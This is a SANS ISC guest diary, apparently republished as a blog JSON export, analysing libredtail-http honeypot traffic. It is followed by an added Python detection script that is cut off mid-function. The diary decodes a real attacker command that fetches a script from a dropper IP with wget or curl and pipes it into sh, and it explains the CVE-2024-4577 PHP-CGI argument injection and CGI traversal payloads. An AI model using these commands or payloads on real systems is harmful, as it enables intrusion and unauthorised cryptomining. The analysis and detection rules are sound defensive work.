{"id":2795,"date":"2026-04-30T01:04:13","date_gmt":"2026-04-30T01:04:13","guid":{"rendered":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/"},"modified":"2026-04-30T01:04:13","modified_gmt":"2026-04-30T01:04:13","slug":"danger-of-libredtail-guest-diary-wed-apr-29th","status":"publish","type":"post","link":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/","title":{"rendered":"Danger of Libredtail [Guest Diary], (Wed, Apr 29th)"},"content":{"rendered":"<div>\n<p>[This is a Guest Diary by James Roberts, an ISC intern as part of the SANS.edu <a href=\"https:\/\/www.sans.edu\/cyber-security-programs\/bachelors-degree\/\">BACS<\/a> program]<\/p>\n<p>Over the last few months, I have gained valuable experience working with the Internet Storm Center (ISC) operating a honeypot and analyzing its output via a <a href=\"https:\/\/github.com\/bruneaug\/DShield-SIEM\/blob\/main\/README.md\">SIEM<\/a> environment. This work gave me hands-on experience with a system set up on a Raspberry Pi, with command line interfaces, SIEM deployment, networking, and information analysis. It was also a good demonstration of the difficulty of finding useful information in a sea of logged data, and of how to find the interesting items within it. Some of the most interesting items were indicators relating to cryptomining malware.<\/p>\n<p><span style=\"font-size:16px;\"><strong>DShield Honeypot<\/strong><\/span><\/p>\n<p>The DShield sensor is a honeypot system that collects information from HTTP, Telnet, SSH, and firewall logs. When deployed, it uses a Cowrie honeypot to simulate a Debian system and capture SSH and Telnet interactions, web.py and tcp-honeypot.py to simulate various services and capture HTTP and TCP interactions, and finally scripts to collect, process, and submit these logs together with the firewall logs. These logs are sent to ISC, as well as to an ELK SIEM that is set up 
on another system of mine. With the SIEM, I was better able to parse, research, and understand the information produced by the various DShield logs. Sometimes I would see something more interesting than a standard SSH login attempt.<\/p>\n<p><span style=\"font-size:16px;\"><strong>Identifying Something Interesting<\/strong><\/span><\/p>\n<p>Around the halfway point in my internship, I did an attack observation about a type of cryptomining malware known as redtail. After completing that observation, I noticed another, different variety of redtail-based attack that I had previously overlooked, this time operating via HTTP instead of SSH\/Telnet.<\/p>\n<p><img decoding=\"async\" alt=\"\" src=\"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic1(3).png\" style=\"width: 513px; height: 242px;\"><\/p>\n<p>Since libredtail-http was the most commonly occurring User-Agent, and one of the most common items of HTTP information over the entire course of my DShield sensor's deployment, I felt compelled to investigate further.<\/p>\n<p><span style=\"font-size:16px;\"><strong>Overview of the Culprits<\/strong><\/span><\/p>\n<p>While 113 different IP addresses performed libredtail-http activity against the DShield sensor, I am opting to focus my observation on the top three IP addresses for the sake of simplicity.<\/p>\n<p><img decoding=\"async\" alt=\"\" src=\"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic2(1).png\" style=\"width: 624px; height: 61px;\"><\/p>\n<p>All three of these IP addresses attempted the same attack multiple times over the course of several days. The IP addresses came from different countries: Germany, Great Britain, and India. All the observed libredtail-http IP addresses had similar general HTTP behavior, though there are some exceptions. Most of the IP addresses observed additionally attempted to log in to the honeypot via SSH, as well as performing a SYN scan.<\/p>\n<p><img 
decoding=\"async\" alt=\"\" src=\"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic3.png\" style=\"width: 624px; height: 321px;\"><\/p>\n<p><img decoding=\"async\" alt=\"\" src=\"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic4.png\" style=\"width: 427px; height: 343px;\"><\/p>\n<p>IP addresses <span style=\"font-family:Courier New,Courier,monospace;\">82.165.66.87<\/span> and <span style=\"font-family:Courier New,Courier,monospace;\">103.40.61.98<\/span> are almost identical in their behavior, both even exclusively using the same username\/password login combination (admin\/admin). It is likely that all the attackers are actually bots, but these two are most likely running the same script to perform the same probing activity. Based on other information that will be seen later, they might actually be the same attacker using different IP addresses. Their behavior is also more representative of that observed from the other attackers. IP address <span style=\"font-family:Courier New,Courier,monospace;\">2.27.53.96<\/span> is much more aggressive in its SSH login attempts and less aggressive in the number of ports it scans. Much of its activity is still similar to that of the other observed IP addresses, but it is unique in some ways.<\/p>\n<p><span style=\"font-size:16px;\"><strong>Patterns of Behavior<\/strong><\/span><\/p>\n<p>Each of the attacks begins with a series of four HTTP POST requests.<\/p>\n<p>From IP 103.10.61.98 on March 27 0623 UTC<\/p>\n<p>http.request.body\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 http.response.body.content\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 url.query<br \/>\n<img decoding=\"async\" alt=\"\" src=\"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic5.png\" style=\"width: 624px; height: 68px;\"><br \/>\n<img decoding=\"async\" alt=\"\" src=\"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic6.png\" style=\"width: 624px; 
height: 70px;\"><\/p>\n<p>The first two POST requests are effectively the same; the only difference is that the first one URL-encodes the directory traversal to \/bin\/sh while the second one does not. The traversal is looking for a CGI misconfiguration that would let the attacker execute \/bin\/sh directly. The request body then tries to fetch 31.57.216.121\/sh with wget or curl and pipe it into sh. On March 3, similar behavior was logged with <span style=\"font-family:Courier New,Courier,monospace;\">178.16.55.224\/sh<\/span> instead. IP address <span style=\"font-family:Courier New,Courier,monospace;\">82.165.66.87<\/span> also attempted to reach both of these addresses, and IP <span style=\"font-family:Courier New,Courier,monospace;\">2.27.53.96<\/span> additionally used <span style=\"font-family:Courier New,Courier,monospace;\">46.151.182.82<\/span>. The fetched script is run with the argument apache.selfrep. The \u201cselfrep\u201d suffix indicates self-replication, i.e. the script spreads the infection onward, and the prefix records which vector (here the Apache path traversal) delivered it; the section on the malware below shows the same script installing the miner. IPs <span style=\"font-family:Courier New,Courier,monospace;\">31.57.216.121<\/span>, <span style=\"font-family:Courier New,Courier,monospace;\">178.16.55.224<\/span>, and <span style=\"font-family:Courier New,Courier,monospace;\">46.151.182.82<\/span> are known malicious IP addresses associated with cryptomining malware infrastructure. The url.query field holds the request body in its original form, which is base64-encoded. The base64 encoding was likely done to obfuscate the attack, to deliver it more reliably against a wider variety of systems, or both.<\/p>\n<p>The next two POST requests relate directly to CVE-2024-4577, a PHP-CGI argument injection vulnerability strongly associated with redtail malware. The request body line \u201c: d+allow_url_include=1+ d+auto_prepend_file=php:\/\/input\u201d abuses a flaw in older PHP versions running as CGI on Windows: the \u201cBest-Fit\u201d character mapping replaces certain characters with others, so the soft hyphen byte (0xAD, rendered as the blank in front of each d above) becomes \u201c-\u201d and \u201c-d\u201d is parsed as a php-cgi command line option, allowing the attacker to set arbitrary PHP configuration and run arbitrary PHP code. In this case the injected options make PHP include the HTTP request body as code (auto_prepend_file=php:\/\/input). That request body invokes a shell (logged as shell.exe) with a base64 encoded set of commands, \u201c<span style=\"font-family:Courier New,Courier,monospace;\">KHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8tIGh0dHBzOi8vMzEuNTcuMjE2LjEyMS9zaCB8fCBjdXJsIC1zayBodHRwczovLzMxLjU3LjIxNi4xMjEvc2gpIHwgc2ggLXMgY3ZlXzIwMjRfNDU3Ny5zZWxmcmVw<\/span>\u201d, which decodes to (wget --no-check-certificate -qO- https:\/\/31.57.216.121\/sh || curl -sk https:\/\/31.57.216.121\/sh) | sh -s cve_2024_4577.selfrep. These are very similar to the commands found in the previous POST requests, only with cve_2024_4577.selfrep instead of apache.selfrep as the argument, recording which exploit delivered the script. Additionally, echo(md5(&#8220;Hello CVE-2024-4577&#8221;)) is run to print a known value into the response, so the scanner can confirm from the reply that its PHP code actually executed. Like the other POST requests, the original query was encoded in base64.<\/p>\n<p>Next the attack probes various .php installation paths. Each path is requested with \u201c&lt;?php echo(md5(&#8220;Hello PHPUnit&#8221;));\u201d as the request body; if the requested path exists and evaluates its input, the MD5 shows up in the response. This reconnaissance is likely being done to map out which PHP components are installed and, by extension, which other vulnerabilities could be exploited in the future.<\/p>\n<p>From IP 82.165.66.87 on March 27 12:55 UTC<\/p>\n<p>http.request.body.content\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 http.response.body.content<br \/>\n<img decoding=\"async\" alt=\"\" src=\"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic7.png\" style=\"width: 612px; height: 259px;\"><\/p>\n<p>In addition to the HTTP interactions, the IP addresses also attempt to interact with the honeypot by logging in via SSH and by SYN-scanning various ephemeral ports. When an SSH login succeeds, no further commands are run. The logins and port scans typically occur hours before or after the HTTP requests and are likely the bot performing those probes independently of anything related to HTTP. The SYN scans consistently produced failures for the scanned ports.<\/p>\n<p><span style=\"font-size:16px;\"><strong>From IP 2.27.53.96<\/strong><\/span><\/p>\n<p>Timestamp\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Source IP\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Source port\/outcome<br \/>\n<img decoding=\"async\" alt=\"\" src=\"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic8.png\" style=\"width: 572px; height: 160px;\"><\/p>\n<p><span style=\"font-size:16px;\"><strong>Redtail Cryptomining Malware<\/strong><\/span><\/p>\n<p>While the attack engages in several actions, perhaps the most important is running the fetched script as cve_2024_4577.selfrep. That script performs several actions: determining the system architecture, finding directories where it can write new files, searching cron jobs for other cryptominers and stopping their services, and installing the matching build of redtail under the name \u2018.redtail\u2019 so that it is a hidden file. Builds of redtail exist for x86_64, i686, aarch64, and arm7. While redtail cryptominers have been part of the threat landscape since 2023, libredtail-http and CVE-2024-4577 started appearing later, in mid 2024.<\/p>\n<p><img decoding=\"async\" alt=\"\" src=\"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic9.png\" style=\"width: 624px; height: 162px;\"><\/p>\n<p><span 
style=\"font-size:16px;\"><strong>How to Protect against Redtail<\/strong><\/span><\/p>\n<p><span style=\"font-family:Courier New,Courier,monospace;\">Protection and remediation, why it matters<\/span><\/p>\n<p>There are many things that can be done to protect against this type of attack. If possible, patching to a current version of PHP removes CVE-2024-4577 from the picture. A rule that blocks the libredtail-http User-Agent on a WAF, reverse proxy, IPS, host firewall, or a tool like Fail2Ban would stop the attacks seen here, with the caveat that a scanner can change its User-Agent at any time. Rules could also be written to block requests whose query or body contains a bare IP address followed by \/sh (any variation of ip.ip.ip.ip\/sh), a pattern seen throughout these attacks and rarely in legitimate traffic; the same pattern, and the md5(&#8220;Hello ...&#8221;) canary strings, are worth alerting on. Given the volume of HTTP traffic these bots create, monitoring network activity for unusual behavior, such as outbound connections to the dropper IP addresses listed above, could help discover a compromise. Requiring key-based SSH authentication (or authentication against a central server) and disabling password logins protects a system against the credential-guessing SSH attempts seen alongside the HTTP activity.<\/p>\n<p>[1] https:\/\/isc.sans.edu\/honeypot.html<br \/>\n[2] https:\/\/github.com\/cowrie\/cowrie<br \/>\n[3] https:\/\/infosecwriteups.com\/honeypots-102-setting-up-a-sans-internet-storm-centers-dshield-honeypot-1ec1774bd949<br \/>\n[4] https:\/\/github.com\/bruneaug\/DShield-SIEM\/blob\/main\/README.md<br \/>\n[5] https:\/\/192.168.80.139\/app\/dashboards#\/view\/d525c518-3e97-4375-9e38-ded8f18934a4?_g=(filters:!(),time:(from:now-90d%2Fd,to:now))<br \/>\n[6] https:\/\/www.joesandbox.com\/analysis\/1851676\/0\/html<br \/>\n[7] https:\/\/www.joesandbox.com\/analysis\/1890665\/0\/html<br \/>\n[8] https:\/\/www.joesandbox.com\/analysis\/1893948\/0\/html<br \/>\n[9] https:\/\/www.socdefenders.ai\/threats\/b91c3aa2-d17d-4621-8f76-99e3226bdecb<br \/>\n[10] https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2024-4577<br \/>\n[11] https:\/\/www.forescout.com\/blog\/new-redtail-malware-exploited-via-php-security-vulnerability\/<br \/>\n[12] 
https:\/\/roccosicilia.com\/2025\/07\/15\/cve-2024-4577-payload-analysis\/<br \/>\n[13] https:\/\/www.sans.edu\/cyber-security-programs\/bachelors-degree\/<\/p>\n<p>&#8212;&#8212;&#8212;&#8211;<br \/>\nGuy Bruneau <a href=\"http:\/\/www.ipss.ca\/\">IPSS Inc.<\/a><br \/>\n<a href=\"https:\/\/github.com\/bruneaug\/\">My GitHub Page<\/a><br \/>\nTwitter: <a href=\"https:\/\/twitter.com\/guybruneau\">GuyBruneau<\/a><br \/>\ngbruneau at isc dot sans dot edu<\/p>\n<p> (c) SANS Internet Storm Center. https:\/\/isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.<\/p><\/div>\n","protected":false},"excerpt":{"rendered":"<p>[This is a Guest Diary by James Roberts, an ISC intern as part of the SANS.edu BACS program] Over the last few months, I have gained valuable experience working with the Internet Storm Center (ISC) operating a honeypot and analyzing its output via a SIEM environment.\u00a0 This work gave me hands on experience with system [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[90],"tags":[91],"class_list":["post-2795","post","type-post","status-publish","format-standard","hentry","category-cybersecurity","tag-cybersecurity"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Danger of Libredtail [Guest Diary], (Wed, Apr 29th) - Imperative Business Ventures Limited<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" 
href=\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Danger of Libredtail [Guest Diary], (Wed, Apr 29th) - Imperative Business Ventures Limited\" \/>\n<meta property=\"og:description\" content=\"[This is a Guest Diary by James Roberts, an ISC intern as part of the SANS.edu BACS program] Over the last few months, I have gained valuable experience working with the Internet Storm Center (ISC) operating a honeypot and analyzing its output via a SIEM environment.\u00a0 This work gave me hands on experience with system [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/\" \/>\n<meta property=\"og:site_name\" content=\"Imperative Business Ventures Limited\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-30T01:04:13+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic1(3).png\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"headline\":\"Danger of Libredtail [Guest Diary], (Wed, Apr 29th)\",\"datePublished\":\"2026-04-30T01:04:13+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/\"},\"wordCount\":1482,\"image\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic1(3).png\",\"keywords\":[\"Cybersecurity\"],\"articleSection\":[\"Cybersecurity\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/\",\"url\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/\",\"name\":\"Danger of Libredtail [Guest Diary], (Wed, Apr 29th) - Imperative Business Ventures 
Limited\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic1(3).png\",\"datePublished\":\"2026-04-30T01:04:13+00:00\",\"author\":{\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"breadcrumb\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#primaryimage\",\"url\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic1(3).png\",\"contentUrl\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic1(3).png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/blog.ibvl.in\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Danger of Libredtail [Guest Diary], (Wed, Apr 29th)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/blog.ibvl.in\/#website\",\"url\":\"https:\/\/blog.ibvl.in\/\",\"name\":\"Imperative Business Ventures 
Limited\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/blog.ibvl.in\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\/\/blog.ibvl.in\"],\"url\":\"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"Danger of Libredtail [Guest Diary], (Wed, Apr 29th) - Imperative Business Ventures Limited","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/","og_locale":"en_US","og_type":"article","og_title":"Danger of Libredtail [Guest Diary], (Wed, Apr 29th) - Imperative Business Ventures Limited","og_description":"[This is a Guest Diary by James Roberts, an ISC intern as part of the SANS.edu BACS program] Over the last few months, I have gained valuable experience working with the Internet Storm Center (ISC) operating a honeypot and analyzing its output via a SIEM environment.\u00a0 This work gave me hands on experience with system [&hellip;]","og_url":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/","og_site_name":"Imperative Business Ventures Limited","article_published_time":"2026-04-30T01:04:13+00:00","og_image":[{"url":"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic1(3).png","type":"","width":"","height":""}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. 
reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#article","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/"},"author":{"name":"admin","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"headline":"Danger of Libredtail [Guest Diary], (Wed, Apr 29th)","datePublished":"2026-04-30T01:04:13+00:00","mainEntityOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/"},"wordCount":1482,"image":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#primaryimage"},"thumbnailUrl":"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic1(3).png","keywords":["Cybersecurity"],"articleSection":["Cybersecurity"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/","url":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/","name":"Danger of Libredtail [Guest Diary], (Wed, Apr 29th) - Imperative Business Ventures 
Limited","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/#website"},"primaryImageOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#primaryimage"},"image":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#primaryimage"},"thumbnailUrl":"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic1(3).png","datePublished":"2026-04-30T01:04:13+00:00","author":{"@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"breadcrumb":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#primaryimage","url":"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic1(3).png","contentUrl":"https:\/\/isc.sans.edu\/diaryimages\/images\/James_Roberts_pic1(3).png"},{"@type":"BreadcrumbList","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/04\/30\/danger-of-libredtail-guest-diary-wed-apr-29th\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/blog.ibvl.in\/"},{"@type":"ListItem","position":2,"name":"Danger of Libredtail [Guest Diary], (Wed, Apr 29th)"}]},{"@type":"WebSite","@id":"https:\/\/blog.ibvl.in\/#website","url":"https:\/\/blog.ibvl.in\/","name":"Imperative Business Ventures 
Limited","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/blog.ibvl.in\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/blog.ibvl.in"],"url":"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/"}]}},"_links":{"self":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/2795","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/comments?post=2795"}],"version-history":[{"count":0,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/2795\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/media?parent=2795"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/categories?post=2795"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/tags?post=2795"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
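Detection logic for the patterns the diary above describes, as an added example that is not part of the original diary and not DShield or ISC code: it decodes the base64 body quoted in the text (the only real capture used here), emulates the Windows best-fit mapping that turns `%ADd` into `-d` for CVE-2024-4577, flags the bare-IP `/sh` download piped into `sh` and the `.selfrep` vector argument, flags the libredtail-http User-Agent and the CGI traversal to `/bin/sh`, and checks whether a response carries the MD5 canary that proves the injected PHP ran. The record field names (src, path, query, user_agent, body, response), the sample records, the `shell_exec(base64_decode(...))` form of the PHP body, and the PHPUnit eval-stdin.php probe path are all assumptions made for the example, not values taken from the diary.

```python
"""Triage of DShield-style web-honeypot records for the libredtail-http / redtail
patterns described in the diary.  Added example; the record field names and the
SAMPLE_EVENTS below are constructed, not the real DShield schema or captures."""
import base64
import binascii
import hashlib
import re
from urllib.parse import unquote_to_bytes

# Base64 body quoted in the diary (copied from the text; this one is a real capture).
CAPTURED_B64 = ("KHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8tIGh0dHBzOi8vMzEuNTcuMjE2LjEyMS9zaCB8fCBjdXJs"
                "IC1zayBodHRwczovLzMxLjU3LjIxNi4xMjEvc2gpIHwgc2ggLXMgY3ZlXzIwMjRfNDU3Ny5zZWxmcmVw")

DROPPER_RE = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})/sh(?![\w.])")  # bare-IP /sh download
PIPE_TO_SH_RE = re.compile(r"\|\s*sh\b")                                     # ... piped into a shell
VECTOR_RE = re.compile(r"\bsh\s+-s\s+(\S+\.selfrep)")                        # sh -s <vector>.selfrep
ARGINJ_RE = re.compile(r"-d\s*(allow_url_include|auto_prepend_file)\s*=", re.I)
CANARY_RE = re.compile(r'md5\("([^"]+)"\)')                                  # echo(md5("Hello ..."))
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_captured() -> str:
    """Decode the diary's base64 body; the result is the download-and-run one-liner."""
    return base64.b64decode(CAPTURED_B64).decode()


def best_fit_normalize(raw_query: str) -> str:
    """URL-decode a query string and emulate the Windows best-fit mapping php-cgi is
    subject to: the soft hyphen 0xAD (%AD) becomes '-', so '%ADd' reads as the -d option."""
    decoded = unquote_to_bytes(raw_query.replace("+", " "))
    return decoded.replace(b"\xad", b"-").decode("latin-1")


def try_b64(text: str):
    """Return the decoded text if `text` is well-formed base64 of readable data, else None."""
    text = text.strip()
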